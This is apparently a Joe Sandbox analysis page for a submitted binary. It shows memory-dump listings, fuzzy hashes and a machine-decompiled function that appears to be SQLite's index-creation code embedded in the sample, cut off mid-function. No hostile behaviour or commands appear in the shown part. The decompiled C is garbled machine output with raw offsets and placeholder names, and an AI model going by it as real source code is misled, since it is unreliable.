Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID: DispatcherExceptionUserstdext::threads::lock_error::lock_error
String ID:
API String ID: 3035003668-0
Opcode ID: 7b720166347dbc892a4de72bb1769fb7f1652d53a9a461802365323720934483
Instruction ID: c4e74de28bc46edad6899c9d2cc136aecb7f708f040e2dea0840beca3936fc9c
Opcode Fuzzy Hash: 7b720166347dbc892a4de72bb1769fb7f1652d53a9a461802365323720934483
Instruction Fuzzy Hash: C6F0903484460C768B04B7F4F80699DB7AC9E10314B60E126BF6CB54E2EF70A62695D5

Uniqueness

Uniqueness Score: -1.00%

Function 00E8E95D Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,?,?,00E76649,00000000,00000000,00E34B17,00000008), ref: 00E8E98F

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: e2158ae1bb4c5bc6bd8d76248146de04081fbb013f9cfb0ad7d4e2d5a006aa77
Instruction ID: 7a1ac1a7f4616e531aded00285631de38bac5ee234a00ea1437b19154f04c7de
Opcode Fuzzy Hash: e2158ae1bb4c5bc6bd8d76248146de04081fbb013f9cfb0ad7d4e2d5a006aa77
Instruction Fuzzy Hash: 20E0E5311412209AE6713767AC04B6B7A889FC17B0F153195FC2CBA391DBA0CC0183E5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00DDF560 Relevance: 28.9, Strings: 22, Instructions: 1388
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E00DDF560(signed int __ecx, signed int __edx, signed int _a4, signed int _a8, signed short* _a12, signed int _a16, signed int _a20, signed int _a24, signed int _a28, signed int _a32, signed int _a36) {
				signed int _v8;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v61;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed short* _v104;
				intOrPtr _v108;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t623;
				intOrPtr _t628;
				void* _t630;
				void* _t634;
				signed int _t639;
				signed int _t640;
				signed int _t641;
				signed int _t645;
				signed int _t646;
				signed int _t648;
				signed int _t649;
				intOrPtr _t655;
				signed int _t656;
				signed int* _t675;
				signed int _t679;
				signed int _t680;
				intOrPtr _t684;
				intOrPtr _t688;
				void* _t694;
				void* _t698;
				signed int _t700;
				intOrPtr _t708;
				intOrPtr _t713;
				void* _t721;
				signed int _t726;
				signed int _t728;
				signed int _t732;
				signed int _t734;
				intOrPtr _t735;
				signed int _t743;
				signed int _t748;
				signed int _t749;
				signed int _t751;
				signed int _t752;
				intOrPtr* _t760;
				signed int _t770;
				char* _t772;
				signed int _t774;
				signed int _t775;
				intOrPtr _t776;
				signed int _t778;
				intOrPtr _t779;
				signed int _t787;
				signed int _t790;
				signed int _t796;
				signed int _t803;
				signed int _t804;
				signed int _t807;
				signed int _t814;
				intOrPtr _t816;
				signed int _t819;
				signed int _t821;
				signed int _t822;
				signed int _t823;
				signed int _t824;
				signed int _t827;
				signed char _t832;
				signed char _t834;
				signed int _t839;
				signed int _t841;
				signed int _t842;
				signed int _t845;
				intOrPtr* _t848;
				intOrPtr _t849;
				intOrPtr _t858;
				signed int _t867;
				signed int _t868;
				signed int _t871;
				intOrPtr _t874;
				intOrPtr* _t876;
				signed int _t877;
				void* _t878;
				void* _t879;
				void* _t880;
				signed int _t881;
				signed int _t882;
				signed int _t883;
				intOrPtr _t884;
				intOrPtr* _t885;
				signed int _t886;
				signed char _t887;
				short _t888;
				signed int _t889;
				signed short* _t890;
				signed char _t892;
				signed int _t893;
				void* _t894;
				signed int _t895;
				intOrPtr _t908;
				signed int _t909;
				void* _t913;
				signed int _t914;
				signed int _t917;
				signed int _t918;
				signed int _t924;
				signed int _t927;
				signed int _t928;
				signed char _t929;
				signed int _t930;
				signed int _t931;
				signed int _t932;
				signed int _t934;
				signed int _t936;
				signed int _t937;
				signed int _t940;
				signed int _t941;
				signed int _t943;
				signed int _t944;
				intOrPtr _t947;
				void* _t950;
				signed int _t959;
				signed int _t960;
				intOrPtr _t961;
				signed short _t966;
				signed int _t968;
				char _t971;
				signed int _t973;
				signed int _t975;
				signed int _t979;
				intOrPtr _t982;
				signed int _t983;
				char* _t984;
				signed int _t985;
				void* _t989;
				signed int _t993;
				signed char _t1000;
				signed int _t1005;
				signed int _t1007;
				signed int _t1008;
				intOrPtr* _t1011;
				signed int _t1015;
				void* _t1016;
				signed int _t1023;
				signed int _t1028;
				signed int _t1029;
				intOrPtr _t1030;
				signed int _t1035;
				signed int _t1041;
				signed int _t1043;
				signed int _t1044;
				signed int _t1046;
				signed int _t1047;
				intOrPtr _t1050;
				void* _t1056;
				signed int _t1060;
				intOrPtr* _t1061;
				void* _t1062;
				signed short* _t1063;
				signed int _t1064;
				signed int _t1065;
				signed int _t1066;
				signed int _t1069;
				void* _t1070;
				signed int _t1072;
				signed int _t1077;
				signed int _t1079;
				signed int _t1080;
				signed int _t1083;
				signed int _t1087;
				signed int _t1088;
				void* _t1089;
				void* _t1090;
				void* _t1091;
				signed int _t1092;
				intOrPtr _t1093;
				signed int _t1094;
				void* _t1096;
				signed int _t1097;
				intOrPtr _t1098;
				intOrPtr* _t1100;
				signed int _t1101;
				signed int _t1102;
				char* _t1103;
				void* _t1104;
				signed int _t1105;
				char* _t1106;
				char* _t1107;
				signed int _t1108;
				intOrPtr _t1109;
				signed int _t1111;
				intOrPtr _t1112;
				void* _t1113;
				void* _t1114;
				void* _t1115;
				intOrPtr* _t1117;
				intOrPtr* _t1119;
				signed int _t1120;
				intOrPtr* _t1121;
				signed int _t1123;
				signed int _t1124;
				signed int _t1125;
				signed int _t1126;
				signed char* _t1127;
				signed int _t1128;
				signed int _t1129;
				signed int _t1130;
				signed int _t1131;
				signed int _t1133;
				void* _t1134;
				signed int _t1137;
				signed int _t1139;
				void* _t1140;
				intOrPtr _t1141;
				signed char* _t1142;
				signed int _t1143;
				intOrPtr _t1144;
				signed int _t1145;
				signed int _t1146;
				signed int _t1148;
				void* _t1149;
				void* _t1151;

				_t1148 = (_t1146 & 0xfffffff8) - 0x6c;
				_t623 =  *0xed8944; // 0xccebfc3b
				_v8 = _t623 ^ _t1148;
				_t876 = __ecx;
				_v104 = _a12;
				_v40 = _a16;
				_v48 = _a24;
				_t628 =  *__ecx;
				_t1111 = __edx;
				_v88 = __ecx;
				_t1023 = _a8;
				_t1087 = _a4;
				_v76 = _t1023;
				_v108 = _t628;
				_v56 = 0;
				_v96 = 0;
				_v60 = 0;
				_v72 = 0;
				if( *((intOrPtr*)(_t628 + 0x49)) != 0 ||  *((intOrPtr*)(__ecx + 0x24)) > 0 ||  *((intOrPtr*)(__ecx + 0x190)) != 0 && _a36 != 2) {
					_t1112 = _t628;
					_t1088 = 0;
					goto L92;
				} else {
					if( *((intOrPtr*)(_t628 + 0x9d)) != 0) {
						L9:
						__eflags = _t1023;
						if(_t1023 == 0) {
							_t1092 =  *(_t876 + 0x1b0);
							_v100 = _t1092;
							__eflags = _t1092;
							if(_t1092 == 0) {
								goto L7;
							} else {
								_t1028 =  *(_t1092 + 0x48);
								_v92 = 0xfff0bdc0;
								__eflags = _t1028;
								if(_t1028 != 0) {
									_t1008 =  *(_t628 + 0x14);
									_t895 = 0;
									_v92 = 0;
									__eflags = _t1008;
									if(_t1008 > 0) {
										_t848 =  *((intOrPtr*)(_t628 + 0x10)) + 0xc;
										asm("o16 nop [eax+eax]");
										while(1) {
											__eflags =  *_t848 - _t1028;
											if( *_t848 == _t1028) {
												break;
											}
											_t895 = _t895 + 1;
											_t848 = _t848 + 0x10;
											__eflags = _t895 - _t1008;
											if(_t895 < _t1008) {
												continue;
											}
											break;
										}
										_v92 = _t895;
									}
								}
								goto L46;
							}
						} else {
							__eflags =  *(_t1087 + 4);
							_t849 =  *_t876;
							if( *(_t1087 + 4) <= 0) {
								_v92 =  *(_t849 + 0x9c) & 0x000000ff;
								_v56 = _t1111;
								L17:
								_t1144 = _v108;
								__eflags =  *((char*)(_t1144 + 0x9d));
								if( *((char*)(_t1144 + 0x9d)) != 0) {
									L21:
									_t1080 = _v92;
								} else {
									_t868 = E00DE32F0(_t876, _t1023);
									__eflags =  *(_t1087 + 4);
									if( *(_t1087 + 4) != 0) {
										goto L21;
									} else {
										_t1080 = _v92;
										__eflags = _t868;
										if(_t868 != 0) {
											__eflags =  *((intOrPtr*)(_t868 + 0x48)) -  *((intOrPtr*)( *((intOrPtr*)(_t1144 + 0x10)) + 0x1c));
											_t1080 =  ==  ? 1 : _t1080;
											_v92 = _t1080;
										}
									}
								}
								_t1108 = _v76;
								_v32 = _t876;
								_t1011 = (_t1080 << 4) +  *((intOrPtr*)( *_t876 + 0x10));
								_v16 = "index";
								_v20 =  *_t1011;
								_v28 =  *((intOrPtr*)(_t1011 + 0xc));
								__eflags = _t1080 - 1;
								_v12 = _v56;
								_v24 = 0 | _t1080 == 0x00000001;
								E00DD9580( &_v32, _t1108);
								_t1145 =  *(_t1108 + 8);
								__eflags = _t1145;
								if(_t1145 == 0) {
									_t858 =  *((intOrPtr*)(_t1108 + 0xc));
								} else {
									_t1109 =  *_t876;
									_t1016 = 0;
									_t1083 =  *(_t1109 + 0x14);
									__eflags = _t1083;
									if(_t1083 > 0) {
										_t867 =  *((intOrPtr*)(_t1109 + 0x10)) + 0xc;
										__eflags = _t867;
										while(1) {
											__eflags =  *_t867 - _t1145;
											if( *_t867 == _t1145) {
												goto L27;
											}
											_t1016 = _t1016 + 1;
											_t867 = _t867 + 0x10;
											__eflags = _t1016 - _t1083;
											if(_t1016 < _t1083) {
												continue;
											}
											goto L27;
										}
									}
									L27:
									_t1108 = _v76;
									_t858 =  *((intOrPtr*)( *((intOrPtr*)(_t1109 + 0x10)) + (_t1016 + _t1016) * 8));
								}
								_t1092 = E00DDA460(_t876, 0,  *((intOrPtr*)(_t1108 + 0x10)), _t858);
								_t1148 = _t1148 + 8;
								_v100 = _t1092;
								__eflags = _t1092;
								if(_t1092 == 0) {
									goto L7;
								} else {
									__eflags = _v92 - 1;
									if(_v92 != 1) {
										L33:
										__eflags =  *(_t1092 + 0x24) & 0x00000020;
										if(( *(_t1092 + 0x24) & 0x00000020) != 0) {
											_t1015 =  *(_t1092 + 8);
											_v72 = _t1015;
											__eflags = _t1015;
											if(_t1015 != 0) {
												while(1) {
													__eflags = ( *(_t1015 + 0x38) & 0x00000003) - 2;
													if(( *(_t1015 + 0x38) & 0x00000003) == 2) {
														break;
													}
													_t1015 =  *(_t1015 + 0x14);
													__eflags = _t1015;
													if(_t1015 != 0) {
														continue;
													}
													break;
												}
												_v72 = _t1015;
											}
										}
										L46:
										_t908 = _v108;
										_t1029 = 7;
										_t881 =  *_t1092;
										_t639 = _v92 << 4;
										_t1117 =  *((intOrPtr*)(_t908 + 0x10)) + _t639;
										_v44 = _t639;
										_v80 = _t1117;
										__eflags = _t881;
										if(_t881 == 0) {
											_t1030 = _t908;
											goto L67;
										} else {
											_t1142 = _t881;
											_t1106 = "sqlite_";
											while(1) {
												_t832 =  *_t1142;
												_t1029 = _t1029 - 1;
												__eflags = _t832;
												if(_t832 == 0) {
													break;
												}
												_t1007 =  *_t1106 & 0x000000ff;
												_t845 = _t832 & 0x000000ff;
												__eflags =  *((intOrPtr*)(_t845 + 0xecc550)) -  *((intOrPtr*)(_t1007 + 0xecc550));
												if( *((intOrPtr*)(_t845 + 0xecc550)) ==  *((intOrPtr*)(_t1007 + 0xecc550))) {
													_t1142 =  &(_t1142[1]);
													_t1106 =  &(_t1106[1]);
													__eflags = _t1029;
													if(_t1029 > 0) {
														continue;
													} else {
														_t1029 = _t1029 - 1;
														__eflags = _t1029;
													}
												}
												break;
											}
											__eflags = _t1029;
											if(_t1029 < 0) {
												L54:
												_t1030 = _v108;
												__eflags =  *((char*)(_t1030 + 0x9d));
												if( *((char*)(_t1030 + 0x9d)) != 0) {
													_t1117 = _v80;
													_t1092 = _v100;
													goto L67;
												} else {
													_t1143 = _t881 + 7;
													_t1079 = 9;
													__eflags = _t1143;
													if(__eflags == 0) {
														L63:
														E00D981E0(__eflags, _v88, "table %s may not be indexed", _t881);
														_t1112 = _v108;
														_t1148 = _t1148 + 0xc;
														_t1088 = 0;
														goto L92;
													} else {
														_t1107 = "altertab_";
														while(1) {
															_t834 =  *_t1143;
															_t1079 = _t1079 - 1;
															__eflags = _t834;
															if(_t834 == 0) {
																break;
															}
															_t1005 =  *_t1107 & 0x000000ff;
															_t839 = _t834 & 0x000000ff;
															__eflags =  *((intOrPtr*)(_t839 + 0xecc550)) -  *((intOrPtr*)(_t1005 + 0xecc550));
															if( *((intOrPtr*)(_t839 + 0xecc550)) ==  *((intOrPtr*)(_t1005 + 0xecc550))) {
																_t1143 = _t1143 + 1;
																_t1107 =  &(_t1107[1]);
																__eflags = _t1079;
																if(_t1079 > 0) {
																	continue;
																} else {
																	_t1079 = _t1079 - 1;
																	__eflags = _t1079;
																}
															}
															break;
														}
														__eflags = _t1079;
														if(_t1079 < 0) {
															goto L64;
														} else {
															__eflags = ( *(( *_t1143 & 0x000000ff) + 0xecc550) & 0x000000ff) - ( *(( *_t1107 & 0x000000ff) + 0xecc550) & 0x000000ff);
															if(__eflags == 0) {
																goto L64;
															} else {
																goto L63;
															}
														}
													}
												}
											} else {
												_t841 =  *_t1106 & 0x000000ff;
												_t842 =  *_t1142 & 0x000000ff;
												__eflags = ( *(_t842 + 0xecc550) & 0x000000ff) != ( *(_t841 + 0xecc550) & 0x000000ff);
												if(( *(_t842 + 0xecc550) & 0x000000ff) != ( *(_t841 + 0xecc550) & 0x000000ff)) {
													L64:
													_t1117 = _v80;
													_t1030 = _v108;
													_t1092 = _v100;
													L67:
													__eflags =  *(_t1092 + 0xc);
													if(__eflags == 0) {
														__eflags =  *(_t1092 + 0x38);
														if(__eflags == 0) {
															_t640 = _v56;
															__eflags = _t640;
															if(_t640 == 0) {
																_t641 =  *(_t1092 + 8);
																_t909 = 1;
																__eflags = _t641;
																while(_t641 != 0) {
																	_t641 =  *(_t641 + 0x14);
																	_t909 = _t909 + 1;
																	__eflags = _t641;
																}
																_push(_t909);
																_t1088 = E00D97470(_t1030, "sqlite_autoindex_%s_%d", _t881);
																_t1148 = _t1148 + 0x10;
																_v84 = _t1088;
																__eflags = _t1088;
																if(_t1088 == 0) {
																	goto L75;
																} else {
																	_t882 = _v88;
																	__eflags =  *((char*)(_t882 + 0x190));
																	if( *((char*)(_t882 + 0x190)) != 0) {
																		_t150 = _t1088 + 7;
																		 *_t150 =  *(_t1088 + 7) + 1;
																		__eflags =  *_t150;
																	}
																	_t1093 = _v108;
																	goto L106;
																}
															} else {
																_t1088 =  *_t640;
																_t1141 =  *((intOrPtr*)(_t640 + 4));
																__eflags = _t1088;
																if(_t1088 != 0) {
																	asm("adc eax, eax");
																	_t819 = E00D95440(_t1030, _t1141 + 1, 0);
																	_t1148 = _t1148 + 8;
																	_v84 = _t819;
																	__eflags = _t819;
																	if(_t819 == 0) {
																		_t1088 = _v84;
																	} else {
																		_t1088 = _t819;
																		L00E79650(_t1088, _t1088, _t1141);
																		_t1148 = _t1148 + 0xc;
																		 *((char*)(_t1088 + _t1141)) = 0;
																	}
																	E00D982D0(_t1088);
																	__eflags = _t1088;
																	if(_t1088 == 0) {
																		goto L75;
																	} else {
																		_t882 = _v88;
																		_t821 = E00DDB040(_t882, _t1088);
																		_t1112 = _v108;
																		__eflags = _t821;
																		if(_t821 != 0) {
																			goto L92;
																		} else {
																			__eflags =  *((intOrPtr*)(_t1112 + 0x9d)) - _t821;
																			if( *((intOrPtr*)(_t1112 + 0x9d)) != _t821) {
																				L84:
																				_t1117 = _v80;
																				_t1093 = _v108;
																				_t822 = E00DDA5F0(_t1093, _t1088,  *_t1117);
																				_t1148 = _t1148 + 4;
																				__eflags = _t822;
																				if(_t822 == 0) {
																					L106:
																					_t1118 =  *_t1117;
																					__eflags = _v92 - 1;
																					_t644 =  ==  ? "sqlite_temp_master" : "sqlite_master";
																					_t645 = E00DD9A20(0x12,  ==  ? "sqlite_temp_master" : "sqlite_master", 0,  *_t1117);
																					_t1148 = _t1148 + 0xc;
																					__eflags = _t645;
																					if(_t645 != 0) {
																						L306:
																						_t1112 = _v108;
																						goto L91;
																					} else {
																						_t1119 = _v100;
																						__eflags = _v92 - 1;
																						_t646 = E00DD9A20(1 + (0 | _v92 == 0x00000001) * 2, _v84,  *_t1119, _t1118);
																						_t1148 = _t1148 + 0xc;
																						__eflags = _t646;
																						if(_t646 != 0) {
																							goto L306;
																						} else {
																							_t1035 = _v104;
																							__eflags = _t1035;
																							if(_t1035 != 0) {
																								_t1120 =  *_t1035;
																								__eflags = _t1120 -  *((intOrPtr*)( *_t882 + 0x6c));
																								if(__eflags > 0) {
																									E00D981E0(__eflags, _t882, "too many columns in %s", "index");
																									_t1035 = _v104;
																									_t1148 = _t1148 + 0xc;
																									goto L126;
																								}
																								goto L127;
																							} else {
																								_t893 =  *( *((intOrPtr*)(_t1119 + 4)) + ( *((short*)(_t1119 + 0x2a)) +  *((short*)(_t1119 + 0x2a))) * 8 - 0x10);
																								__eflags = _t893;
																								if(_t893 != 0) {
																									_t1137 = _t893;
																									_t989 = _t1137 + 1;
																									do {
																										_t807 =  *_t1137;
																										_t1137 = _t1137 + 1;
																										__eflags = _t807;
																									} while (_t807 != 0);
																									_t1139 = _t1137 - _t989 & 0x3fffffff;
																									__eflags = _t1139;
																								} else {
																									_t1139 = 0;
																								}
																								_t168 = _t1139 + 0x31; // 0x31
																								_t1105 = E00D95440(_t1035, _t168, 0);
																								_t1151 = _t1148 + 8;
																								__eflags = _t1105;
																								if(_t1105 != 0) {
																									_t814 = E00E79BD0(_t1105, _t1105, 0, 0x30);
																									 *_t1105 = 0x3b;
																									 *((short*)(_t1105 + 0x22)) = _t814 | 0xffffffff;
																									_t1151 = _t1151 + 0xc;
																									_t170 = _t1105 + 0x30; // 0x30
																									_t816 = _t170;
																									 *((intOrPtr*)(_t1105 + 8)) = _t816;
																									__eflags = _t1139;
																									if(_t1139 != 0) {
																										L00E79650(_t816, _t893, _t1139);
																										_t816 =  *((intOrPtr*)(_t1105 + 8));
																										_t1151 = _t1151 + 0xc;
																									}
																									 *((char*)(_t816 + _t1139)) = 0;
																									 *(_t1105 + 0x18) = 1;
																								}
																								_t882 = _v88;
																								_t1140 =  *_t882;
																								_t1035 = E00D95440(_t1035, 0x1c, 0);
																								_t1148 = _t1151 + 8;
																								_v104 = _t1035;
																								__eflags = _t1035;
																								if(_t1035 == 0) {
																									__eflags = _t1105;
																									if(_t1105 != 0) {
																										E00DCCB80(_t1140, _t1105);
																									}
																									_t1112 = _v108;
																									_t877 = 0;
																									_t1088 = _v84;
																								} else {
																									_t993 = _a28;
																									asm("xorps xmm0, xmm0");
																									 *_t1035 = 1;
																									asm("movups [edx+0x8], xmm0");
																									 *((intOrPtr*)(_t1035 + 0x18)) = 0;
																									 *(_t1035 + 4) = _t1105;
																									__eflags = _t993;
																									if(_t993 >= 0) {
																										 *(_t1035 + ( *_t1035 +  *_t1035 * 2) * 8 - 8) = _t993;
																									}
																									L126:
																									_t1120 =  *_t1035;
																									L127:
																									__eflags = _t1120;
																									if(_t1120 > 0) {
																										_t1072 = _t1035 + 4;
																										__eflags = _t1072;
																										do {
																											_t984 =  *_t1072;
																											__eflags =  *_t984 - 0x5e;
																											if( *_t984 == 0x5e) {
																												_t985 =  *(_t984 + 8);
																												__eflags = _t985;
																												if(_t985 != 0) {
																													_t1104 = _t985 + 1;
																													do {
																														_t804 =  *_t985;
																														_t985 = _t985 + 1;
																														__eflags = _t804;
																													} while (_t804 != 0);
																													_t985 = _t985 - _t1104 & 0x3fffffff;
																													__eflags = _t985;
																												}
																												_t803 = _v96 + 1 + _t985;
																												__eflags = _t803;
																												_v96 = _t803;
																											}
																											_t1072 = _t1072 + 0x18;
																											_t1120 = _t1120 - 1;
																											__eflags = _t1120;
																										} while (_t1120 != 0);
																									}
																									_t1121 = _v84;
																									_t913 = _t1121 + 1;
																									asm("o16 nop [eax+eax]");
																									do {
																										_t648 =  *_t1121;
																										_t1121 = _t1121 + 1;
																										__eflags = _t648;
																									} while (_t648 != 0);
																									_t649 = _v72;
																									_t1123 = _t1121 - _t913 & 0x3fffffff;
																									__eflags = _t649;
																									if(_t649 == 0) {
																										_t914 = 1;
																									} else {
																										_t914 =  *(_t649 + 0x32) & 0x0000ffff;
																									}
																									_t1094 = E00DDF4C0(_v108, ( *_v104 & 0x0000ffff) + _t914, _v96 + 1 + _t1123,  &_v60);
																									_t1148 = _t1148 + 8;
																									_t655 = _v108;
																									_v96 = _t1094;
																									__eflags =  *((char*)(_t655 + 0x49));
																									if( *((char*)(_t655 + 0x49)) != 0) {
																										_t1112 = _t655;
																										goto L304;
																									} else {
																										_t917 = _v60;
																										 *_t1094 = _t917;
																										_t918 = _t1123 + 1;
																										_v60 = _t917 + 1 + _t1123;
																										L00E79650( *_t1094, _v84, _t918);
																										_t1148 = _t1148 + 0xc;
																										_t1040 = _v100;
																										 *((char*)(_t1094 + 0x36)) = _v40;
																										 *((intOrPtr*)(_t1094 + 0xc)) = _v100;
																										asm("sbb ecx, ecx");
																										 *(_t1094 + 0x38) = (_t918 & 0x00000008 |  *(_t1094 + 0x38) & 0xfffffff7) & 0xfffffffc | _a36 & 3;
																										_t924 = _v48;
																										 *((intOrPtr*)(_t1094 + 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_v108 + 0x10)) + _v44 + 0xc));
																										 *(_t1094 + 0x32) =  *_v104;
																										__eflags = _t924;
																										if(__eflags != 0) {
																											_t924 = _t882;
																											E00DCB6A0(_t924, _t1040, __eflags, 2, _t924, 0);
																											_t1148 = _t1148 + 0xc;
																											_t1040 = _v100;
																											 *((intOrPtr*)(_t1094 + 0x24)) = _v48;
																											__eflags = 0;
																											_v48 = 0;
																										}
																										_t883 = 0;
																										_v80 = 0;
																										_v61 =  *((intOrPtr*)( *((intOrPtr*)(_v80 + 0xc)) + 0x4c));
																										_t675 = _v104;
																										_t1124 =  &(_t675[1]);
																										_v68 = _t1124;
																										__eflags =  *_t675;
																										if( *_t675 <= 0) {
																											L191:
																											_t1125 = _v72;
																											__eflags = _t1125;
																											if(_t1125 == 0) {
																												 *( *((intOrPtr*)(_t1094 + 4)) + _t883 * 2) = _t924 | 0xffffffff;
																												 *( *((intOrPtr*)(_t1094 + 0x20)) + _t883 * 4) = "BINARY";
																											} else {
																												_t1102 = 0;
																												__eflags = 0 -  *(_t1125 + 0x32);
																												if(0 <  *(_t1125 + 0x32)) {
																													_t889 = _v96;
																													do {
																														_t968 =  *(_t889 + 0x32) & 0x0000ffff;
																														_t890 =  *(_t889 + 4);
																														_t1063 = _t890;
																														_t1130 =  *( *((intOrPtr*)(_t1125 + 4)) + _t1102 * 2) & 0x0000ffff;
																														__eflags = _t968;
																														if(_t968 == 0) {
																															L197:
																															_t1064 = _v80;
																															_t890[_t1064] = _t1130;
																															_t1125 = _v72;
																															_t889 = _v96;
																															 *((intOrPtr*)( *((intOrPtr*)(_t889 + 0x20)) + _t1064 * 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t1125 + 0x20)) + _t1102 * 4));
																															 *((char*)(_t1064 +  *((intOrPtr*)(_t889 + 0x1c)))) =  *((intOrPtr*)(_t1102 +  *((intOrPtr*)(_t1125 + 0x1c))));
																															_t1065 = _t1064 + 1;
																															__eflags = _t1065;
																															_v80 = _t1065;
																														} else {
																															while(1) {
																																_t770 =  *_t1063 & 0x0000ffff;
																																_t1063 =  &(_t1063[1]);
																																_t968 = _t968 - 1;
																																__eflags = _t1130 - _t770;
																																if(_t1130 == _t770) {
																																	break;
																																}
																																__eflags = _t968;
																																if(_t968 > 0) {
																																	continue;
																																} else {
																																	goto L197;
																																}
																																goto L198;
																															}
																															_t889 = _v96;
																															_t1125 = _v72;
																															 *((intOrPtr*)(_t889 + 0x34)) =  *((intOrPtr*)(_t889 + 0x34)) + 0xffff;
																														}
																														L198:
																														_t1102 = _t1102 + 1;
																														__eflags = _t1102 - ( *(_t1125 + 0x32) & 0x0000ffff);
																													} while (_t1102 < ( *(_t1125 + 0x32) & 0x0000ffff));
																												}
																												_t1094 = _v96;
																											}
																											L00DE0700(_t1094);
																											_t679 = _v88;
																											__eflags =  *(_t679 + 0x1b0);
																											if( *(_t679 + 0x1b0) == 0) {
																												E00DDCA00(_t1094);
																											}
																											__eflags = _v76;
																											_t927 = _v100;
																											if(_v76 != 0) {
																												_t1129 =  *(_t1094 + 0x34) & 0x0000ffff;
																												__eflags = _t1129 -  *((short*)(_t927 + 0x2a));
																												if(_t1129 >=  *((short*)(_t927 + 0x2a))) {
																													 *(_t1094 + 0x38) =  *(_t1094 + 0x38) | 0x00000020;
																													_t1062 = 0;
																													_t1101 =  *((short*)(_t927 + 0x2a));
																													_v68 =  *(_t1094 + 0x38);
																													__eflags = _t1101;
																													if(_t1101 <= 0) {
																														L217:
																														_t1094 = _v96;
																													} else {
																														_t888 =  *((short*)(_t927 + 0x28));
																														do {
																															__eflags = _t1062 - _t888;
																															if(_t1062 == _t888) {
																																goto L215;
																															} else {
																																_t966 = 0;
																																__eflags = _t1129;
																																if(_t1129 == 0) {
																																	L211:
																																	_t1094 = _v96;
																																	_t927 = _v100;
																																	 *(_t1094 + 0x38) = _v68 & 0xffffffdf;
																																} else {
																																	_t760 =  *((intOrPtr*)(_v96 + 4));
																																	while(1) {
																																		__eflags = _t1062 -  *_t760;
																																		if(_t1062 ==  *_t760) {
																																			break;
																																		}
																																		_t966 = _t966 + 1;
																																		_t760 = _t760 + 2;
																																		__eflags = _t966 - _t1129;
																																		if(_t966 < _t1129) {
																																			continue;
																																		} else {
																																			goto L211;
																																		}
																																		goto L218;
																																	}
																																	__eflags = _t966 & 0x0000ffff;
																																	if((_t966 & 0x0000ffff) < 0) {
																																		goto L211;
																																	} else {
																																		goto L215;
																																	}
																																}
																															}
																															goto L218;
																															L215:
																															_t1062 = _t1062 + 1;
																															__eflags = _t1062 - _t1101;
																														} while (_t1062 < _t1101);
																														_t927 = _v100;
																														goto L217;
																													}
																												}
																											}
																											L218:
																											_t1041 = _v88;
																											__eflags = _t927 -  *((intOrPtr*)(_t1041 + 0x1b0));
																											if(_t927 !=  *((intOrPtr*)(_t1041 + 0x1b0))) {
																												L235:
																												_t1112 = _v108;
																												__eflags =  *((char*)(_t1112 + 0x9d));
																												if( *((char*)(_t1112 + 0x9d)) == 0) {
																													__eflags =  *(_t927 + 0x24) & 0x00000020;
																													if(( *(_t927 + 0x24) & 0x00000020) == 0) {
																														L255:
																														 *((intOrPtr*)(_t1041 + 0x2c)) =  *((intOrPtr*)(_t1041 + 0x2c)) + 1;
																														_t1126 =  *(_t1041 + 8);
																														_t884 =  *((intOrPtr*)(_t1041 + 0x2c));
																														__eflags = _t1126;
																														if(_t1126 != 0) {
																															L261:
																															_t928 =  *(_t1041 + 0x78);
																															__eflags = _t928;
																															_t1096 =  !=  ? _t928 : _t1041;
																															_t929 = _v92;
																															_t1043 = 1 << _t929;
																															_t680 =  *(_t1096 + 0x5c);
																															__eflags = _t680 & _t1043;
																															if((_t680 & _t1043) == 0) {
																																asm("bts eax, ecx");
																																 *(_t1096 + 0x5c) = _t680;
																																__eflags = _t929 - 1;
																																if(_t929 == 1) {
																																	E00DE1990(_t1096);
																																}
																															}
																															 *(_t1096 + 0x14) =  *(_t1096 + 0x14) | 0x00000001;
																															asm("bts eax, ecx");
																															_t1044 =  *(_t1126 + 0x88);
																															__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t1126 + 0xc)) + 0x30)) - _t1044;
																															if(__eflags > 0) {
																																 *(_t1126 + 0x88) = _t1044 + 1;
																																_t930 = _t1044 + _t1044 * 4;
																																_t684 =  *((intOrPtr*)(_t1126 + 0x58));
																																 *((intOrPtr*)(_t684 + _t930 * 4)) = 0xa6;
																																 *((intOrPtr*)(_t684 + 4 + _t930 * 4)) = 0;
																																 *((intOrPtr*)(_t684 + 8 + _t930 * 4)) = 0;
																																 *((intOrPtr*)(_t684 + 0xc + _t930 * 4)) = 0;
																																 *((intOrPtr*)(_t684 + 0x10 + _t930 * 4)) = 0;
																															} else {
